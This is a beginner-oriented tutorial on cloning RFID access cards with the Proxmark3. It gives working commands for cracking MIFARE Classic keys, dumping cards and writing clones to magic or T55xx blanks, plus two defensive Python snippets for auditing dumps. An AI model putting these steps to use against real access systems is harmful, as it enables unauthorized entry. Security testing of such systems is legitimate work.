Complete Proxmark3 Card Cloning Tutorial — From Beginner to Advanced
This tutorial is a detailed guide to card cloning with the Proxmark3 device. It covers everything from basic setup to advanced techniques, using both GUI and command-line methods.
Part 1: What is Proxmark3 and What Can It Do?
Proxmark3 is an open-source hardware device designed for RFID (Radio Frequency Identification) research, security testing, and card cloning. It can read, write, clone, and analyze various types of RFID and NFC cards.
What Cards Can You Clone?
| Frequency | Card Types | Common Uses | Clone Difficulty |
|---|---|---|---|
| Low Frequency (125 kHz) | EM4100, HID Prox, Indala, T55xx | Building access, parking gates, old door systems | Easy |
| High Frequency (13.56 MHz) | MIFARE Classic (1K/4K), MIFARE Ultralight, NFC tags | Modern access control, transit cards, student IDs | Medium-Hard |
| iClass | HID iClass, iClass SE | Corporate access, high-security facilities | Hard (requires keys) |
What You'll Need
| Item | Purpose | Where to Get |
|---|---|---|
| Proxmark3 device | The hardware reader/writer | Online (AliExpress, eBay, specialized RFID shops) |
| Blank cards | To write cloned data to | Same sources |
| Computer | To run Proxmark3 software | Your own PC |
| USB cable | Connect Proxmark3 to computer | Included with device |
Part 2: Setting Up Your Proxmark3
2.1 Hardware Setup
- Connect your Proxmark3 to your computer via USB cable
- The device should light up (LED indicators may blink)
- You may need to install drivers (see below)
2.2 Software Setup — Three Methods
Method 1: GUI Software (Easiest for Beginners)
The Proxmark3 Easy Gui_X is a graphical interface that makes card cloning accessible to beginners.
| Step | Action |
|---|---|
| 1 | Download Proxmark3 Easy Gui_X (or the newer version called "AiSi Assistant") |
| 2 | Extract the downloaded archive (e.g., Vx x x-win64-xxxxxxx.7z) |
| 3 | Navigate to Vx x x-win64-xxxxxxx\GUI\ |
| 4 | Run Proxmark3GUI.exe |
| 5 | If prompted, enter your order number/registration |
| 6 | Select the correct COM port for your device |
Method 2: Command Line on Windows (ProxSpace)
This is the recommended approach for the Iceman fork (the most actively developed version).
| Step | Action |
|---|---|
| 1 | Download ProxSpace from the GitHub repository |
| 2 | Extract to a folder (avoid spaces in path names) |
| 3 | Run runme64.bat (for 64-bit Windows) |
| 4 | In the ProxSpace terminal, type ./pm3 to launch the client |
| 5 | If the device is not found, check Device Manager for the correct COM port |
Method 3: Linux / macOS (Kali Linux Recommended)
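For the most stable experience, Kali Linux is recommended. The repository cloned in step 2 is the original Proxmark3 repository, not the Iceman fork recommended in Method 2; command syntax differs between the two and the commands in this tutorial mix both styles, so confirm each command against your client's built-in help.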
| Step | Command/Action |
|---|---|
| 1 | Install prerequisites: sudo apt-get install git build-essential libreadline-dev libusb-0.1-4 libusb-dev libqt4-dev perl pkg-config wget libncurses5-dev gcc-arm-none-eabi |
| 2 | Clone repository: git clone https://github.com/Proxmark/proxmark3.git |
| 3 | Enter directory: cd proxmark3 |
| 4 | Compile: make clean && make all |
| 5 | Flash bootrom: ./client/flasher /dev/ttyACM0 -b bootrom/obj/bootrom.elf |
| 6 | Flash full image: ./client/flasher /dev/ttyACM0 armsrc/obj/fullimage.elf |
| 7 | Run client: ./client/proxmark3 /dev/ttyACM0 |
2.3 Verify Your Setup
Once connected, test your device:
| Command | What It Does |
|---|---|
| hw tune | Measures antenna characteristics (voltage should be 20-45+ V) |
| hw version | Shows firmware version |
| hf search | Scans for high-frequency tags |
| lf search | Scans for low-frequency tags |
Part 3: Complete Cloning Tutorials
Tutorial 1: Cloning MIFARE Classic Cards (High Frequency) — GUI Method
This is the most common cloning scenario for access cards.
What You Need:
- Original MIFARE Classic card (your "mother" card)
- Blank UID-writable card (also called "magic card" or Gen1A)
- Proxmark3 device connected to GUI software
Step-by-Step Process:
| Step | Action | Explanation |
|---|---|---|
| 1 | Place the original card on the Proxmark3 antenna | Card must be positioned correctly for reading |
| 2 | In the GUI, click "Read Card Type" | Identifies what kind of card you have |
| 3 | Wait for successful read confirmation | The software will display card information |
| 4 | Click "One-Click Parse" | This attempts to crack all encryption keys automatically |
| 5 | Wait for the cracking process to complete | May take 30 seconds to several minutes depending on card security |
| 6 | Click "OK" on the dialog box | Confirms keys have been found |
| 7 | Click "Read Original Card Data" | Dumps all sectors of the original card |
| 8 | Remove the original card | — |
| 9 | Place a blank UID card on the antenna | This is your target card to write to |
| 10 | Click "Write to UID Card" | Writes the dumped data to the blank card |
| 11 | Wait for completion message | Your clone is now ready |
Tutorial 2: Cloning MIFARE Classic — Command Line Method
For those who prefer more control and understanding of what's happening.
Step 1: Identify the Card
| Command | What It Does |
|---|---|
| hf search | Automatically detects and identifies high-frequency tags |
| hf 14a reader | Reads ISO14443-A card information |
Step 2: Crack Keys Using autopwn (Recommended Method)
The easiest way to crack keys is using the built-in autopwn command:
| Command | Explanation |
|---|---|
| hf mf autopwn -f mfc_default_keys | Automatically attacks the card using default key dictionary |
This command will:
- Load the default key dictionary (1,819+ keys)
- Try strategies to find valid keys for each sector
- If default keys don't work, fall back to hardnested attack
Step 3: Alternative Key Cracking Methods
If autopwn doesn't work, try these approaches:
| Command | Use Case |
|---|---|
| hf mf chk *1 ? d default_keys.dic | Check all sectors against default key dictionary |
| hf mf hardnested 0 A 8829da9daf76 4 A w | Run hardnested attack on specific sector (for difficult cards) |
Step 4: Dump the Card Data
Once keys are found:
| Command | Explanation |
|---|---|
| hf mf dump 1 | Dumps the entire 1K card to a binary file (default: dumpdata.bin) |
Step 5: Convert Dump Format (Optional)
To simulate the card later:
| Command | Explanation |
|---|---|
| script run dumptoemul -i dumpdata.bin | Converts .bin file to .eml format for simulation |
Step 6: Load Dump into Memory and Simulate
| Command | Explanation |
|---|---|
| hf mf eload 353C2AA6 | Loads dump into emulator memory (use your actual filename) |
| hf mf sim u 353c2aa6 | Simulates the card with specified UID |
Step 7: Write to Blank Card
| Command | Explanation |
|---|---|
| hf mf restore 1 | Restores the dumped data to a blank card |
Or manually write specific blocks:
| Command | Explanation |
|---|---|
| hf mf wrbl 0 A FFFFFFFFFFFF d3a2859f6b880400c801002000000016 | Writes block 0 (UID block) with specific data |
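Sectors still on well-known default keys are the ones the dictionary check in Steps 2 and 3 recovers first, so a card issuer can audit a dump of their own card for them. The following is an added example, not code from the Proxmark3 project or this tutorial's sources; it assumes a 1024-byte 1K dump with keys filled into the sector trailers, and the function names and sample dump are constructed for illustration.

```python
# Added example (not Proxmark3 code): audit a MIFARE Classic 1K dump for
# sectors still protected by well-known default keys.
DEFAULT_KEYS = {
    bytes.fromhex("FFFFFFFFFFFF"),  # factory transport key
    bytes.fromhex("A0A1A2A3A4A5"),  # MAD sector key A
    bytes.fromhex("D3F7D3F7D3F7"),  # NDEF sector key
    bytes.fromhex("000000000000"),
}
BLOCK_SIZE, BLOCKS_PER_SECTOR, SECTORS = 16, 4, 16

def access_bits_valid(ac: bytes) -> bool:
    """Trailer bytes 6-8 hold C1..C3 twice, once inverted; both copies must agree."""
    c1, c2, c3 = ac[1] >> 4, ac[2] & 0x0F, ac[2] >> 4
    n1, n2, n3 = ac[0] & 0x0F, ac[0] >> 4, ac[1] & 0x0F
    return (c1 ^ n1, c2 ^ n2, c3 ^ n3) == (0xF, 0xF, 0xF)

def audit_dump(dump: bytes) -> list:
    """Return one finding per sector: default-key flags and access-bit integrity."""
    if len(dump) != BLOCK_SIZE * BLOCKS_PER_SECTOR * SECTORS:
        raise ValueError("expected a 1024-byte MIFARE Classic 1K dump")
    findings = []
    for sector in range(SECTORS):
        start = (sector * BLOCKS_PER_SECTOR + 3) * BLOCK_SIZE  # sector trailer
        trailer = dump[start:start + BLOCK_SIZE]
        key_a, access, key_b = trailer[:6], trailer[6:9], trailer[10:]
        findings.append({
            "sector": sector,
            "key_a_default": key_a in DEFAULT_KEYS,
            "key_b_default": key_b in DEFAULT_KEYS,
            "access_bits_ok": access_bits_valid(access),
        })
    return findings

def build_sample_dump() -> bytes:
    """Constructed sample: factory trailers everywhere except sectors 1 and 2."""
    factory = bytes.fromhex("FFFFFFFFFFFFFF078069FFFFFFFFFFFF")
    custom = bytes.fromhex("1A2B3C4D5E6F787788690F1E2D3C4B5A")   # non-default keys
    damaged = bytes.fromhex("FFFFFFFFFFFFFF070069FFFFFFFFFFFF")  # broken access bits
    trailers = {1: custom, 2: damaged}
    return b"".join(bytes(48) + trailers.get(s, factory) for s in range(SECTORS))

if __name__ == "__main__":
    for f in audit_dump(build_sample_dump()):
        if f["key_a_default"] or f["key_b_default"] or not f["access_bits_ok"]:
            print(f)
```

Any sector reported with a default key should be re-keyed with diversified keys before the card is issued.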
Tutorial 3: Setting UID on Magic Cards (Gen1A)
For 4-byte UID cards (Gen1A "magic cards"):
| Command | Explanation |
|---|---|
| hf mf csetuid -u 11223344 | Sets UID to 11223344 (replace with your target UID) |
| hf mf cwipe | Wipes the card (fills with 0xFF) |
Note: Some magic cards have different behaviors:
| Flavor | Characteristics |
|---|---|
| Flavor 1 | Plays SAK from block0; static PRNG; wipe fills with 0xFF |
| Flavor 2 | Plays SAK from block0; static PRNG; wipe fills with 0x00 |
| Flavor 3 | SAK fixed to 08; static PRNG; wipe fills with 0xFF |
| Flavor 4 | SAK fixed to 08; weak PRNG; wipe times out |
Tutorial 4: Cloning Low-Frequency Cards (125 kHz)
For HID Prox, EM4100, and T55xx cards.
Step 1: Read the Card
| Command | Explanation |
|---|---|
| lf search | Automatically detects and identifies low-frequency tags |
| lf hid read | Specifically reads HID Prox cards |
| lf indala read | Specifically reads Indala cards |
| lf em 410x reader | Reads EM4100 cards |
Step 2: Simulate the Card (Test Before Cloning)
| Command | Explanation |
|---|---|
| lf hid sim 200670012d | Simulates HID card with specified ID |
| lf indala sim a0000000c2c436c1 | Simulates Indala card |
Step 3: Clone to T55xx Blank Card
| Command | Explanation |
|---|---|
| lf hid clone 200670012d | Clones HID card to T55xx |
| lf indala clone a0000000c2c436c1 | Clones Indala card to T55xx |
| lf em 410x clone --id 1122334455 | Clones EM4100 card |
Step 4: Verify the Clone
| Command | Explanation |
|---|---|
| lf search | Should read back the cloned ID |
Part 4: Understanding Magic Cards (Blank Cards)
"Magic cards" are special blank cards that allow you to write UIDs and other data normally locked on legitimate cards.
Types of Magic Cards for High Frequency (13.56 MHz)
| Card Type | UID Length | Writable UID? | ATQA/SAK Control | Best For |
|---|---|---|---|---|
| Gen1A (UID) | 4 bytes | Yes (with special commands) | Limited | Most common cloning scenarios |
| UID (CUID) | 4 bytes | Yes | Yes | General cloning |
| FUID | 4 or 7 bytes | Write-once (permanent) | Yes | Permanent clones |
| UFUID | 4 or 7 bytes | Lockable | Yes | Advanced use |
| Gen2 (7-byte UID) | 7 bytes | Yes | Yes | Cards with 7-byte UIDs |
Identifying Your Magic Card
| Command | What to Look For |
|---|---|
| hf mf info | Shows "Magic capabilities... Gen 1a" for Gen1A cards |
| hf 14a reader | Shows UID length (4 or 7 bytes) |
Types of Magic Cards for Low Frequency (125 kHz)
| Chip Type | Common Name | Password | Lockable |
|---|---|---|---|
| T55xx | T55x7, 5577 | Optional (default: 19920427) | Yes |
| EM4305 | EM4x05 | Optional (default: 84AC15E2) | Yes |
| ID82xx | H5, H7, ID8210 | Varies | Varies |
Part 5: Troubleshooting Common Issues
Problem 1: "Auth1 error" during hardnested attack
| Symptom | Possible Cause | Solution |
|---|---|---|
| Multiple "Auth1 error" messages | Card has a hardened PRNG or is not a genuine MIFARE Classic EV1 | Try a different attack strategy or sniff reader-card communication |
Forum expert advice: "EV1 cards with hard protected random number generators can be difficult or possibly impossible to crack... your next best bet might be to try to use your proxmark3 to sniff the conversation between reader and card".
Problem 2: Card not detected after writing UID
| Symptom | Possible Cause | Solution |
|---|---|---|
| "Card doesn't support standard iso14443-3 anticollision" | Incorrect ATQA/SAK configuration | Use hf mf csetuid with proper ATQA parameters |
Example:
hf mf csetuid -u 0366E6323FXXXX --atqa 0088
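On magic cards that play these values from block 0 (see the flavor table in Tutorial 3), the UID, BCC, SAK and ATQA bytes in block 0 are what a reader sees during ISO 14443-3 anticollision, so decoding the block shows why an inconsistent card is rejected. This is an added example, not code from the Proxmark3 project; it handles 4-byte UIDs only, the function name is hypothetical, and the second sample block is constructed from the block 0 value in the wrbl row of Tutorial 2.

```python
# Added example, not Proxmark3 code: decode a 4-byte-UID MIFARE Classic
# block 0 and list the inconsistencies a reader would trip over.
from functools import reduce

# SAK values commonly reported for MIFARE Classic cards
SAK_TYPES = {0x08: "MIFARE Classic 1K", 0x18: "MIFARE Classic 4K",
             0x88: "MIFARE Classic 1K (Infineon)"}

def parse_block0(hex_block: str) -> dict:
    """Split block 0 into UID, BCC, SAK and ATQA and collect anticollision problems."""
    raw = bytes.fromhex(hex_block)
    if len(raw) != 16:
        raise ValueError("block 0 must be exactly 16 bytes")
    uid, bcc, sak, atqa = raw[0:4], raw[4], raw[5], raw[6:8]
    expected_bcc = reduce(lambda a, b: a ^ b, uid)  # BCC is the XOR of the UID bytes
    problems = []
    if bcc != expected_bcc:
        problems.append(f"BCC {bcc:02X} should be {expected_bcc:02X} (XOR of UID bytes)")
    if uid[0] == 0x88:
        problems.append("UID byte 0 is 0x88, the cascade tag used by longer UIDs")
    if sak & 0x04:
        problems.append("SAK bit 0x04 set: signals an incomplete UID")
    if sak not in SAK_TYPES:
        problems.append(f"SAK {sak:02X} is not a MIFARE Classic value in this table")
    return {
        "uid": uid.hex().upper(),
        "bcc_ok": bcc == expected_bcc,
        "sak": sak,
        "card_type": SAK_TYPES.get(sak, "unknown"),
        "atqa_stored": atqa.hex().upper(),  # bytes 6-7 exactly as stored in block 0
        "problems": problems,
    }

# Block 0 value from the wrbl row in Tutorial 2
PAGE_BLOCK0 = "d3a2859f6b880400c801002000000016"
# Constructed: the same block with the BCC byte zeroed
BAD_BCC_BLOCK0 = "d3a2859f00880400c801002000000016"

if __name__ == "__main__":
    for blk in (PAGE_BLOCK0, BAD_BCC_BLOCK0):
        print(parse_block0(blk))
```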
Problem 3: Can't restore to original after failed write
| Solution | Command |
|---|---|
| Wipe the card | hf mf cwipe |
Problem 4: 7-byte UID on 4-byte card
| Issue | Explanation |
|---|---|
| Some cards have 7-byte UIDs but magic cards only support 4-byte | May not work. Forum user reported: "I believed as long as block0 is writable you should be able to write different length UIDs" |
Part 6: Complete Cheatsheet of Essential Commands
General Commands
| Command | Description |
|---|---|
| help | Show all commands |
| hw tune | Test antenna tuning (should be 20-45+ V) |
| hw version | Show firmware version |
| hf search | Auto-detect high-frequency tags |
| lf search | Auto-detect low-frequency tags |
| data plot | Display graphical signal data |
High-Frequency (13.56 MHz) Commands
| Command | Description |
|---|---|
| hf 14a reader | Read ISO14443-A card info |
| hf 14a info | Detailed tag information |
| hf mf chk *1 ? d default_keys.dic | Check default keys on all sectors |
| hf mf autopwn -f mfc_default_keys | Auto-crack using dictionary |
| hf mf hardnested 0 A 8829da9daf76 4 A w | Hardnested attack on sector 4 |
| hf mf dump 1 | Dump 1K card to file |
| hf mf restore 1 | Restore dump to blank card |
| hf mf eload <filename> | Load dump into emulator memory |
| hf mf sim u <UID> | Simulate card with specified UID |
| hf mf csetuid -u <UID> | Set UID on Gen1A magic card |
| hf mf cwipe | Wipe Gen1A magic card |
| hf mf wrbl <block> A <key> <data> | Write specific block |
Low-Frequency (125 kHz) Commands
| Command | Description |
|---|---|
| lf hid read | Read HID Prox card |
| lf hid sim <ID> | Simulate HID card |
| lf hid clone <ID> | Clone HID to T55xx |
| lf indala read | Read Indala card |
| lf indala sim <UID> | Simulate Indala card |
| lf indala clone <UID> | Clone Indala to T55xx |
| lf em 410x reader | Read EM4100 card |
| lf em 410x sim --id <ID> | Simulate EM4100 card |
| lf t55xx detect | Detect T55xx chip |
| lf t55xx dump | Dump T55xx memory |
Part 7: Important Notes and Limitations
What You CAN Clone
| Card Type | Feasibility | Notes |
|---|---|---|
| MIFARE Classic (1K/4K) | Yes (with key cracking) | Most common; vulnerable to hardnested attack |
| MIFARE Ultralight | Yes | No encryption; trivial to clone |
| EM4100 | Yes | No encryption; very easy |
| HID Prox | Yes | No encryption; easy |
| T55xx | Yes | Configurable; medium difficulty |
| Indala | Yes | PSK modulation; medium difficulty |
What You CANNOT Clone (or Very Difficult)
| Card Type | Reason |
|---|---|
| MIFARE DESFire EV2/EV3 | Strong AES-128 encryption; no known public attacks |
| iClass SE | Strong encryption; requires Elite keys |
| Ultra-secure government cards | Multiple layers of security |
| Credit/Debit cards with EMV chips | Dynamic cryptograms; cannot be cloned |
Summary
This tutorial covers everything from basic setup to advanced cloning techniques. The key takeaways:
- Start with GUI software if you're a complete beginner — it handles the complex commands automatically
- Use the Iceman firmware for the most features and active development
- Buy proper blank cards — Gen1A (UID-writable) for MIFARE Classic, T55xx for low-frequency
- Test your clones before relying on them
- Some cards cannot be cloned — modern secure cards like DESFire EV3 are not vulnerable
The Proxmark3 is a powerful tool for RFID research and security testing. Always ensure you have permission to test and clone any cards you work with.